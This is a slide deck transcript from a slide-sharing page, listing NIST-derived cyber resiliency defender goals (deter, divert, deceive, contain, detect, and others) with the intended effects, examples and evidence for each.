HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAUHCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
 
Programming Foundation Models with DSPy - Meetup Slides
Programming Foundation Models with DSPy - Meetup SlidesProgramming Foundation Models with DSPy - Meetup Slides
Programming Foundation Models with DSPy - Meetup Slides
 
AI-Powered Food Delivery Transforming App Development in Saudi Arabia.pdf
AI-Powered Food Delivery Transforming App Development in Saudi Arabia.pdfAI-Powered Food Delivery Transforming App Development in Saudi Arabia.pdf
AI-Powered Food Delivery Transforming App Development in Saudi Arabia.pdf
 
Essentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FMEEssentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FME
 
Building Production Ready Search Pipelines with Spark and Milvus
Building Production Ready Search Pipelines with Spark and MilvusBuilding Production Ready Search Pipelines with Spark and Milvus
Building Production Ready Search Pipelines with Spark and Milvus
 
Video Streaming: Then, Now, and in the Future
Video Streaming: Then, Now, and in the FutureVideo Streaming: Then, Now, and in the Future
Video Streaming: Then, Now, and in the Future
 
How to use Firebase Data Connect For Flutter
How to use Firebase Data Connect For FlutterHow to use Firebase Data Connect For Flutter
How to use Firebase Data Connect For Flutter
 

Talking SoS with Shawn Riley - Cyber Resiliency Effects on Adversary Activities

  • 1. Talking SoS w/Shawn Riley Episode 3 Cyber Resiliency Effects On Adversary Activities Ref: NIST 800-160 Vol 2 App I
  • 2. This video presents a vocabulary for stating claims or hypotheses about the effects of cyber mission assurance decisions on cyber adversary behavior. Cyber mission assurance decisions include choices of cyber defender actions, architectural decisions, and selections and uses of technologies to improve cyber security, resiliency, and defensibility (i.e., the ability to address ongoing adversary activities). The vocabulary enables claims and hypotheses to be stated clearly, comparably across different assumed or real-world environments, and in a way that suggests evidence that might be sought but is independent of how the claims or hypotheses might be evaluated. The vocabulary can be used with multiple modeling and analysis techniques, including Red Team analysis, game-theoretic modeling, attack tree and attack graph modeling, and analysis based on the cyber attack lifecycle (also referred to as cyber kill chain analysis or cyber campaign analysis).
  • 3. Redirect – Direct adversary activities away from defender chosen targets Preclude – Ensure that specific threat events do not have an effect. Impede – Make it more difficult for threat events to cause adverse impacts or consequences. Limit – Restrict the consequences of threat events by limiting the damage or effects they cause in terms of time, system resources, and/or mission or business impacts. Expose – Reduce risk due to ignorance of threat events and possible replicated or similar threat events in the same or similar environments. Defender Goals
  • 4. Defender’s Goal: Redirect – Direct adversary activities away from defender chosen targets Redirect Deter Divert Deceive
  • 5. Defender Goal – Deter • Intended Effect - Discourage the adversary from undertaking further activities, by instilling fear (e.g., of attribution or retribution) or doubt that those activities would achieve intended effects (e.g., that targets exist). • Expected Result - The adversary ceases or suspends activities. • Effect on Risk - Reduce likelihood of occurrence. • Evidence - Activities attributable to the adversary are no longer observed by the organization. Activities attributable to the adversary are no longer observed by other organizations and this fact is made known via threat intelligence information sharing. • Example - The defender uses disinformation to make it appear that the organization is better able to detect attacks than it is, and is willing to launch major counter strikes. The result is that the adversary chooses to not launch attack due to fear of detection and reprisal.
  • 6. Defender Goal – Divert • Intended Effect - Lead the adversary to direct activities away from defender chosen targets. • Expected Result - The adversary refocuses activities on different targets (e.g., other organizations, defender- chosen alternate targets). The adversary’s efforts are wasted. • Effect on Risk - Reduce likelihood of occurrence. • Example - The defender uses selectively planted false information (disinformation) and honeynets (misdirection) to cause an adversary to focus its malware at virtual sandboxes, while at the same time employing obfuscation to hide the actual resources. The result is that the adversary’s attacks are directed away from critical resources. • Evidence - Adversary activities are directed towards defender-chosen alternate targets (e.g., to a special enclave). Activities attributable to the adversary are observed by other organizations and made known via threat intelligence information sharing.
  • 7. Defender Goal – Deceive • Intended Effect - Lead the adversary to believe false information about defended systems, missions, or organizations, or about defender capabilities or TTPs. • Expected Result - The adversary’s efforts are wasted, as the assumptions on which the adversary bases attacks are false. • Effect on Risk - Reduce likelihood of occurrence and/or reduce likelihood of impact. • Example - The defender strategically places false information (disinformation) about the cybersecurity investments that it plans to make. As a result, the adversary’s malware development is wasted by being focused on countering nonexistent cybersecurity protections. • Evidence - Adversary activities reveal that the adversary is relying on false information (e.g., a dummy account is spear phished, delivered malware is tailored to a simulated environment).
  • 8. Defender’s Goal: Preclude – Ensure that specific threat events do not have an effect. Preclude Expunge Preempt Prevent
  • 9. Defender Goal – Expunge • Intended Effect - Remove unsafe, incorrect, or corrupted resources that could cause damage. • Expected Result - The adversary loses a capability for some period, as adversary directed threat mechanisms (e.g., malicious code) are removed. Adversary-controlled resources are so badly damaged that they cannot perform any function or be restored to a usable condition without being entirely rebuilt. • Effect on Risk - Reduce likelihood of impact of subsequent events in the same threat scenario. • Example - The defender uses virtualization to refresh critical software (non-persistent services) at random intervals (temporal unpredictability). As a result, the adversary’s malware that is implanted in the software is expunged. • Evidence - Removal of malware or of privileges from adversary-controlled resources.
  • 10. Defender Goal – Preempt • Intended Effect - Forestall or avoid conditions under which the threat event could occur or result in an effect. • Expected Result - The adversary’s resources cannot be applied and/or the adversary cannot perform activities (e.g., because resources are destroyed or made inaccessible). • Effect on Risk - Reduce likelihood of occurrence and/or reduce likelihood of impact. • Example - Critical software is not assembled (adaptive management) or activated (non-persistent services) until it is needed. The adversary, therefore, cannot perform reconnaissance on, and tailor malware targeted to, the software. • Evidence - The adversary’s resources are observed to be denied (e.g., destroyed, made inaccessible or unusable).
  • 11. Defender Goal – Prevent • Intended Effect - Create conditions under which the threat event cannot be expected to result in an effect. • Expected Result - The adversary’s efforts are wasted, as the assumptions on which the adversary based its attack are no longer valid and as a result, the intended effects cannot be achieved. • Effect on Risk - Reduce likelihood of impact. • Example - Subtle variations in critical software are implemented (synthetic diversity), with the result that the adversary’s malware is no longer able to compromise the targeted software. • Evidence - Logs or other captured data provide evidence that the activity occurred but had no effects.
  • 12. Defender Goal: Impede – Make it more difficult for threat events to cause adverse impacts or consequences. Impede Contain Degrade Delay
  • 13. Defender Goal – Contain • Intended Effect - Restrict the effects of the threat event to a limited set of resources. • Expected Result - The value of the activity to the adversary, in terms of achieving the adversary’s goals, is reduced. • Effect on Risk - Reduce level of impact. • Example - The defender organization makes changes to a combination of internal firewalls and logically separated networks (dynamic segmentation) to isolate enclaves in response to detection of malware, with the result that the effects of the malware is limited to just initially infected enclaves. • Evidence - Damage assessment, in terms of • (Scope) The number of affected resources • (Impact) A function of • The number of affected resources and their value (e.g., criticality) • Duration and the mission or operational cost per unit time
  • 14. Defender Goal – Degrade • Intended Effect - Decrease the likelihood that a given threat event will have a given level of effectiveness or impact. • Expected Result - The adversary achieves some but not all intended effects. The adversary achieves all intended effects but only after taking additional actions. • Effect on Risk - Reduce likelihood of impact and reduce level of impact. • Example - The defender uses multiple browsers and operating systems (architectural diversity) on both end user systems and some critical servers. The result is that malware that is targeted at specific software can only compromise a subset of the targeted systems; a sufficient number continue to operate to keep mission going, although in degraded mode. • Evidence - The number of resources affected by the adversary is lower than for prior instances of the activity. The severity of the impacts caused by the adversary activity is less than for prior instances of the activity. Malware or other attack vectors attributable to the adversary are crafted or tailored, based on failures of prior activities attributable to the same adversary to achieve effects. Repeated activities (e.g., to establish information channels, to start processes) are attributable to the same adversary.
  • 15. Defender Goal – Delay • Intended Effect - Increase the amount of time needed for a threat event to result in adverse impacts. • Expected Result - The adversary achieves the intended effects but may not achieve them within the intended period. The adversary’s activities may, therefore, be exposed to greater risk of detection and analysis. • Effect on Risk - Reduce likelihood of impact and reduce level of impact. • Example - The protection measures (e.g., access controls, encryption) allocated to resources increase in number and strength based on resource criticality (calibrated defense- in-depth). The frequency of authentication challenges varies randomly (temporal unpredictability) and with increased frequency for more critical resources. The result is that it takes the attacker more time to successfully compromise the targeted resources. • Evidence - The length of time between an initial event and its effects, as determined by forensic or other analysis, is increased.
  • 16. Defender Goal: Limit – Restrict the consequences of threat events by limiting the damage or effects they cause in terms of time, system resources, and/or mission or business impacts. Limit Shorten Recover
  • 17. Defender Goal – Shorten • Intended Effect - Limit the duration of a threat event or the conditions caused by a threat event. • Expected Result - The time period during which the adversary’s activities have their intended effects is limited. • Effect on Risk - Reduce level of impact. • Example - The defender employs a diverse set of suppliers (supply chain diversity) for time-critical components. As a result, when an adversary’s attack on one supplier causes it to shut down, the defender can increase its use of the other suppliers, thus shortening the time when it is without the critical components. • Evidence - Damage assessment, in terms of (Time). The duration of an outage or of degraded functionality.
  • 18. Defender Goal – Recover • Intended Effect - Roll back the consequences of a threat event, particularly with respect to mission or business impairment. • Expected Result - The adversary fails to retain mission or business impairment due to recovery of the capability to perform key missions or business operations. • Effect on Risk - Reduce level of impact. • Example - Resources determined to be corrupted or suspect (integrity checks, behavior validation) are restored from a clean copy (protected backup and restore). • Evidence - Recovery metrics, including • (Functionality) Level of performance (typically expressed in terms of Measures of Effectiveness (MOEs), Measures of Performance (MOPs), or Key Performance Parameters (KPPs)). • (Assurance) Degree of trustworthiness or confidence in restored resources.
  • 19. Defender goal: Expose – Reduce risk due to ignorance of threat events and possible replicated or similar threat events in the same or similar environments. Expose Detect Scrutinize Reveal
  • 20. Defender Goal – Detect • Intended Effect - Identify threat events or their effects by discovering or discerning the fact that an event is occurring, has occurred, or (based on indicators, warnings, and precursor activities) is about to occur. • Expected Result - The adversary’s activities become susceptible to defensive responses. • Effect on Risk - Reduce likelihood of impact and reduce level of impact (depending on responses). • Example - The defender continually moves its sensors (functional relocation of sensors), often at random times (temporal unpredictability), to common points of egress from the organization. They combine this with the use of beacon traps (tainting). The result is that the defender can quickly detect efforts by the adversary to exfiltrate sensitive information. • Evidence - Adversary activities are detected, or indicators, warnings, and/or precursor activities are observed.
  • 21. Defender Goal – Scrutinize • Intended Effect - Analyze threat events and artifacts associated with threat events, particularly with respect to patterns of exploiting vulnerabilities, predisposing conditions, and weaknesses, to inform more effective detection and risk response. • Expected Result - The adversary loses the advantages of uncertainty, confusion, and doubt. The defender understands the adversary better, based on analysis of adversary activities, including the artifacts (e.g., malicious code) and effects associated with those activities and on correlation of activity specific observations with other activities (as feasible), and thus can recognize adversary TTPs. • Effect on Risk - Reduce likelihood of impact. • Example - The defender deploys honeynets (misdirection), inviting attacks by the defender, allowing the defender to apply their TTPs in a safe environment. The defender then analyzes (malware and forensic analysis) the malware captured in the honeynet to determine the nature of the attacker’s TTPs, allowing it to develop appropriate defenses. • Evidence - Number and quality (e.g., correctness, usefulness) of malware signatures and characteristics. Number and quality (e.g., degree of confirmation) of observables and indicators. Distinct threat actors and/or campaigns being observed.
  • 22. Defender Goal – Reveal • Intended Effect - Increase awareness of risk factors and relative effectiveness of remediation approaches across the stakeholder community, to support common, joint, or coordinated risk response. • Expected Result - The adversary loses the advantage of surprise and possible deniability. The adversary’s ability to compromise one organization’s systems to attack another organization is impaired, as awareness of adversary characteristics and behavior across the stakeholder community (e.g., across all computer security incident response teams that support a given sector, which might be expected to be attacked by the same actor or actors) is increased. • Effect on Risk - Reduce likelihood of impact, particularly in the future. • Example - The defender participates in threat information sharing and uses dynamically updated threat intelligence data feeds (dynamic threat modeling) to inform actions (adaptive management). • Evidence - Distinct threat actors, campaigns, and/or TTPs observed by multiple organizations. Degree of confidence in attribution of events to threat actors or campaigns.